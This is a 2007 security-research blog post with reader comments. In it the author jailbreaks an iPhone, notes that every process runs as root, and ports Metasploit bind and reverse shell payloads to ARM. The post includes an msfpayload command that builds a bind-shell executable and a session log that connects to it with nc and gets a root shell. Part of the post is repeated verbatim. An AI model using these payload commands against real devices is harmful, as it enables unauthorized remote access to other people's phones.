A root shell in my pocket (and maybe yours)
After the recent price drop and toolchain release, I bit the bullet and bought a shiny new iPhone. The first thing I did is bypass activation, run jailbreak, and install the AppTapp Installer. Using the installer, I added OpenSSH and a VT-100 Terminal to the phone. Once I had shell access, I made a few observations:
1) The processor is actually decent. Compare the iPhone (400Mhz*) with the Nokia n770 (233mhz) or the Nokia n800 (320Mhz) and the choice of a handheld hacking device is a no-brainer. The (mostly) working toolchain, large amounts of storage (8Gb), and ease of use make this a great candidate for almost any security researcher "on-the-go". If you tweak the networking preferences file, you can set the signal quality limit down to "1", turning the "join a WiFi network" screen into a primitive stumbler (or just install Stumbler via AppTapp).
* The media widely reported the processor speed as 620Mhz and I repeated it here. Dan Moniz suggested I check the output of ioreg for the actual CPU speed, which is reported as 400Mhz (0084d717 == 0x17d78400 == 400000000).
2) EDGE network access is horribly slow, but it works. The downside is that the EDGE network provides the phone with a private address, on a point-to-point link, that is three hops away from a public IP range. For example, my phone's EDGE address is 10.x.x.x, its first hop is 172.16.x.x, its second hop is 10.x.x.x, and its third hop is also 10.x.x.x. The fourth hop is a 200.x.x.x address. Latency is between 180ms and 600ms, but averages around 200ms-250ms. I made a few attempts to discover other hosts in the private address space, in hopes of finding other EDGE devices, but instead only found a few scattered routers, switches, and servers.
The phone has been a fun time sink. I used the MobileSafari PDF viewer to read all of the recent Uninformed Journal articles. Metasploit 2 runs decently, even though the Terminal isn't the best interface for a screen of this size. Metasploit 3 should run, as soon as the toolchain is capable of building a working Ruby interpreter (yes, there is a Ruby package in AppTapp, yes its totally broken). When that day comes, I hope the EDGE network can handle it :-)
Having a network-enabled root shell in my pocket is great, but being able to pop a root shell on someone else's iPhone is even better. A few things to keep in mind:
1) Every process runs as root. MobileSafari, MobileMail, even the Calculator, all run with full root privileges. Any security flaw in any iPhone application can lead to a complete system compromise. A rootkit takes on a whole new meaning when the attacker has access to the camera, microphone, contact list, and phone hardware. Couple this with "always-on" internet access over EDGE and you have a perfect spying device.
2) The mDNSResponder service runs by default. This service is also known by the names Bonjour, ZeroConf, and Rendezvous. When the iPhone is first sync'ed with iTunes, the hostname is changed. The default hostname becomes "User's iPhone", where "User" is Mac OS X user account used to perform the sync. If the iPhone is connected to a WiFi network, the mDNS service will advertise itself on the local network, exposing the user name of the iPhone's owner. So far, it doesn't look like the mDNS service responds to normal probes, so at least active discovery is less likely (maybe the sysctl parameter net.inet.udp.no_5353=1 has something to do with it).
3) The MobileMail application supports Microsoft Office document formats. It does this by using the OfficeImporter framework to convert these documents into a viewable form. This looks like a great target for file-format fuzzing and some late night reverse engineering.
4) Independent Security Evaluators demonstrated a code-execution vulnerability in the iPhone at Black Hat 2007. Their slides describe the exploit and shellcode development process. Since then, the toolchain and amount of public information has improved considerably.
The first step to iPhone exploits is platform support for the Metasploit Framework. To support a new platform, the architecture must be defined in rex/constants.rb. I added two new architectures, one for ARM little endian (armle), and another for ARM big endian (armbe), since many ARM chips can run in either mode.
The next step is figure out the payloads. Fortunately, I wrote many of Metasploit's PowerPC modules for Mac OS X. The iPhone uses the same syscall numbers, so porting payloads is straightforward. On Mac OS X PowerPC, the system call number is placed into r0 and the arguments start at register r3. On the iPhone, the system call number is placed into r12 and the arguments start at r0.
For example, the "exit" system call on PowerPC looks like:
By comparison, the same code on the iPhone looks like:
With only a few headaches, I was able to port the bind shell and reverse shell payloads to the iPhone. I added a very simple nop generator to match. At this point, its possible to generate working iPhone shellcode using the trunk version of Metasploit 3. For kicks, I rewrote Charlie Millers's "vibrate" shellcode (listed in the ISE slides) as well. The Metasploit version is a little bit smaller and uses the correct address for Firmware 1.02. The next step is finish my XOR (well, EOR on ARM) encoder, and start playing with thumb mode (16 bit instructions). Since shellcode is no fun unless you can do something with it, I added support for iPhone executables to the msfpayload command. This allows you to generate stand-alone bind/reverse shell executables using the following syntax:
This binary can be copied to the iPhone using SSH or iPHUC/iPhoneTool and executed.
Once the XOR encoder is done, the only step left is to find the bugs and write the exploits :-)
1) The processor is actually decent. Compare the iPhone (400Mhz*) with the Nokia n770 (233mhz) or the Nokia n800 (320Mhz) and the choice of a handheld hacking device is a no-brainer. The (mostly) working toolchain, large amounts of storage (8Gb), and ease of use make this a great candidate for almost any security researcher "on-the-go". If you tweak the networking preferences file, you can set the signal quality limit down to "1", turning the "join a WiFi network" screen into a primitive stumbler (or just install Stumbler via AppTapp).
* The media widely reported the processor speed as 620Mhz and I repeated it here. Dan Moniz suggested I check the output of ioreg for the actual CPU speed, which is reported as 400Mhz (0084d717 == 0x17d78400 == 400000000).
2) EDGE network access is horribly slow, but it works. The downside is that the EDGE network provides the phone with a private address, on a point-to-point link, that is three hops away from a public IP range. For example, my phone's EDGE address is 10.x.x.x, its first hop is 172.16.x.x, its second hop is 10.x.x.x, and its third hop is also 10.x.x.x. The fourth hop is a 200.x.x.x address. Latency is between 180ms and 600ms, but averages around 200ms-250ms. I made a few attempts to discover other hosts in the private address space, in hopes of finding other EDGE devices, but instead only found a few scattered routers, switches, and servers.
The phone has been a fun time sink. I used the MobileSafari PDF viewer to read all of the recent Uninformed Journal articles. Metasploit 2 runs decently, even though the Terminal isn't the best interface for a screen of this size. Metasploit 3 should run, as soon as the toolchain is capable of building a working Ruby interpreter (yes, there is a Ruby package in AppTapp, yes its totally broken). When that day comes, I hope the EDGE network can handle it :-)
Having a network-enabled root shell in my pocket is great, but being able to pop a root shell on someone else's iPhone is even better. A few things to keep in mind:
1) Every process runs as root. MobileSafari, MobileMail, even the Calculator, all run with full root privileges. Any security flaw in any iPhone application can lead to a complete system compromise. A rootkit takes on a whole new meaning when the attacker has access to the camera, microphone, contact list, and phone hardware. Couple this with "always-on" internet access over EDGE and you have a perfect spying device.
2) The mDNSResponder service runs by default. This service is also known by the names Bonjour, ZeroConf, and Rendezvous. When the iPhone is first sync'ed with iTunes, the hostname is changed. The default hostname becomes "User's iPhone", where "User" is Mac OS X user account used to perform the sync. If the iPhone is connected to a WiFi network, the mDNS service will advertise itself on the local network, exposing the user name of the iPhone's owner. So far, it doesn't look like the mDNS service responds to normal probes, so at least active discovery is less likely (maybe the sysctl parameter net.inet.udp.no_5353=1 has something to do with it).
3) The MobileMail application supports Microsoft Office document formats. It does this by using the OfficeImporter framework to convert these documents into a viewable form. This looks like a great target for file-format fuzzing and some late night reverse engineering.
4) Independent Security Evaluators demonstrated a code-execution vulnerability in the iPhone at Black Hat 2007. Their slides describe the exploit and shellcode development process. Since then, the toolchain and amount of public information has improved considerably.
The first step to iPhone exploits is platform support for the Metasploit Framework. To support a new platform, the architecture must be defined in rex/constants.rb. I added two new architectures, one for ARM little endian (armle), and another for ARM big endian (armbe), since many ARM chips can run in either mode.
The next step is figure out the payloads. Fortunately, I wrote many of Metasploit's PowerPC modules for Mac OS X. The iPhone uses the same syscall numbers, so porting payloads is straightforward. On Mac OS X PowerPC, the system call number is placed into r0 and the arguments start at register r3. On the iPhone, the system call number is placed into r12 and the arguments start at r0.
For example, the "exit" system call on PowerPC looks like:
li r0, 1 ; SYS_exit
li r3, 255 ; Exit code 255
sc ; System call
By comparison, the same code on the iPhone looks like:
mov r12, #1 ; SYS_exit
mov r0, #255 ; Exit code 255
swi 128 ; System call
With only a few headaches, I was able to port the bind shell and reverse shell payloads to the iPhone. I added a very simple nop generator to match. At this point, its possible to generate working iPhone shellcode using the trunk version of Metasploit 3. For kicks, I rewrote Charlie Millers's "vibrate" shellcode (listed in the ISE slides) as well. The Metasploit version is a little bit smaller and uses the correct address for Firmware 1.02. The next step is finish my XOR (well, EOR on ARM) encoder, and start playing with thumb mode (16 bit instructions). Since shellcode is no fun unless you can do something with it, I added support for iPhone executables to the msfpayload command. This allows you to generate stand-alone bind/reverse shell executables using the following syntax:
$ msfpayload osx/armle/shell_bind_tcp LPORT=4444 X > iphone_bindshell.bin
This binary can be copied to the iPhone using SSH or iPHUC/iPhoneTool and executed.
$ ssh root@192.168.0.125
# chmod +x iphone_bindshell.bin
# ./iphone_bindshell.bin
---
$ nc -vvn 192.168.0.125 4444
(UNKNOWN) [192.168.0.125] 4444 (krb524) open
id
uid=0 euid=1 gid=0(wheel) groups=0(wheel)
uname -a
Darwin Metasploit Developer's iPhone 9.0.0d1
Darwin Kernel Version 9.0.0d1: Fri Jun 22 00:38:56 PDT 2007;
root:xnu-933.0.1.178.obj~1/RELEASE_ARM_S5L8900XRB iPhone1,1 Darwin
Once the XOR encoder is done, the only step left is to find the bugs and write the exploits :-)
posted by hdm at 8:28 PM
15 Comments:
Nice One :)
Darn smart!
You're contribution will surely help the iPhone dev-team and who knows, even inspire some other smarties to assist in the hunting.
Thanks!
you f^cking Rock!!! cant wait to see the versions develope.
hd,
got to say it: metasploit rocks
just curious why you were not part of the new syngress metasploit book. do you have something coming out book wise, or is that what the documentation is for? ;)
good stuff
Regarding the Syngress book on Metasploit -- we chose not to be part of the project for quite a few reasons. The biggest one is the fact that Metasploit was (and is) a moving target. Syngress wanted to start writing the book while we were transitioning between 2.7 and 3.0. The book they released this week has over half of its content dedicated to an obsolete version of the Framework. Personally, I am not a fan of Syngress's style, quality, editing skills, or marketing abilities. We DO have a community book that is in the works and any help you want to provide would be useful:
http://en.wikibooks.org/wiki/Metasploit
Actually, n800 is a hacker's choice :)
Of course 330MHz is smaller than 400.Actually in n800 there is way to use 400 too BUT then second DSP core should be down-clocked, sort of trade-off.But 330 MHz are pretty enough to have bunch of fun. What n800 can do?
- The screen is 800x480.A way better for the web.And for entering text to the terminals :)
- EDGE\3G goes via external device and can be a way better than EDGE.
- Wi-Fi is both fast and consumes very small power in idle mode while keeping link alive.
- Great bluetooth connectivity.Low powered as well and yes, it copes with dozens of connections easily.
- Dozen of tools are ported.Like nmap, kismet, aircrack, curl\wget, ... and much more.Due to official SDK which making porting just a joke:)
- You can even wardrive using gpsd to learn what and where.
- There is openvpn to get to anywhere.No matter you're using EDGE and lame local IP, etc.
- There is even nginx and php-fastcgi so your server is with you :)
- Bluetooth utils to ... er... to audit these remote devices :)
- Real mc filemanager, sshing to your pocket and dealing with files on device and it's cards is a real fun.
- TCPDump allows to know what's going up.
- Some GUI fun.On n800 you can run full-featured Liunx apps.Like mplayer to watch let's say .FLV file.Or Pidgin to chat via ICQ,MSN,Jabber.Or maybe xchat to hang on IRC.Or MaemoMapper to navigate via maps like google streets optionally using GPS reciever.Some VNC and RemoteDesktop fun as well.You're ruling your world :-).Decent VoIP features.Including SIP (a whole dozen of operators like Gizmo) and Skype.MythTV is also here.And well, it runs Firefox.To be exact, reduced version of great browser based on Gecko 1.9.Yes, this Gecko is beta which will be used by Firefox 3, but even today it can easily beat any other pocket browser just jokingly (on Ajax-based sites, or YouTube, he-he).
- We can mess with our OS as we wish.If we want to, we can rebuild kernel and other parts like initfs.Allowing device to boot up from cards, have unusual kernel features not available out of the box (like various filesystems support added, or advanced SDHC patches for fast speeds, or whatever else kernel does).
What n800 can not?
- It can't be cell phone.Yes.Kinda unique for Nokia.But in exchange you're getting FREEDOM.Device is not locked to any carrier.No strings attached.No restrictions.Nothing crippled.Real Debian linux inside.You can even apt-get something instead of using app manager, result is same :-).You're getting real unrestricted pocket computer from beginning.iPhone is just a dialer and player by design.So you're hacking to take your rights and Apple can always stop you with updates.We're using our rights.Nokia will not stop us.Because their device created to be FREE and give you some FREEDOM.
- Yes, n800 can not limit you as well.It's perfectly hackable.You do not have to fight with dumb barriers.You do not have to afraid updates.Just have fun :-)
- And yes, n800 can't be such buzzword.It rather intended for thinking people while iPhone is dumb dialer with player targeted on dumb people by design (so it is a way more restrictive without hacking).
Of course you can break'n'enter.But Apple may decide to prevent "homebrew" apps with updates.So this way can be just headache.
As for me, looks like some people are not seeking simple way but rather their own.That's good, too.ARM shellcode... users should tremble since there is so much ARM devices today =).Great work!Did I mentioned ARM asm rocks compared to x86 one? ;)
Amazing job HDM.
Having a network-based root shell in my pocket does feel good, especially after reading your blog.
its people like you who fuck it up for the rest of us....get a life beyond trying endlessly to hack into other peoples phones... hey, there is a knock on the door, mom wants her basement back and she wants you to join the human world.
Anarchy is a pain in the ass, you asswipe.
if you have any ego, you will answer to this rather than delete..which i assume you will..
Matthew, its people like you who make this all worthwhile :-)
as ceo of apple...i would hire you instantly:)
nice work bro :)
I agree with n800_User tho .. n800 is a better choice for a handheld hacking device.
i have been thinking about getting an n800 or maybe the n810, or maybe the Asus Eee - but I am coming from my trustworthy zaurus sl-5500 that I have had many years. My problem is, the zaurus is old and maybe a little slower, but it does everything I want it to do with auditing/pen testing....I did get metasploit up to 2.7 to work on it, but could never get 3 to work - lots of info on it at edwiget.name if anyone finds this useful. I never could find any gps + cable or 10/100 ethernet card for it...but wireless works great. I love the zaurus so much, I would love to trick it out with all its options and then just put it away....so if anyone has any stuff for it...contact me.
Matthew, did you just throw insults at the legendary HDM? I don't think you even realize what you've just done.
Its actually quite the opposite, its better a credible person such as HD finds this stuff out so something can be done about it rather than the people who really want to do damage..
Matthew: ignorance is not safe.
Computers are by design flawed...
they need to know what to run.
And there will always be people that wants/needs to know what's going on under the hood. And thank God, else you would throw away anything that stops working!
And what about making something work better / make it more capable...
well if it can be done, (like jailbreaking the ipod touch/iphone) then IT SHOULD BE DONE! (ie: Apple, as soon as you heared of installer.app, you should have bought them big time and provided the solution... but that's not getting money in, so f*ck it! .... .
... .... ... money... ... yeah ..
) ... enough said about that!
HD: great article!
I need to know something:
you talk about modifying the "network preference file" to allow for weaker networks to pop up ..
humm .. do you mind doing a tutorial on that ? I couldnt find this info on google ! Thanks!
-Madlogik
/private/var/preferences/SystemConfiguration/com.apple.wifi.plist
Post a Comment
Links to this post:
Create a Link
<< Home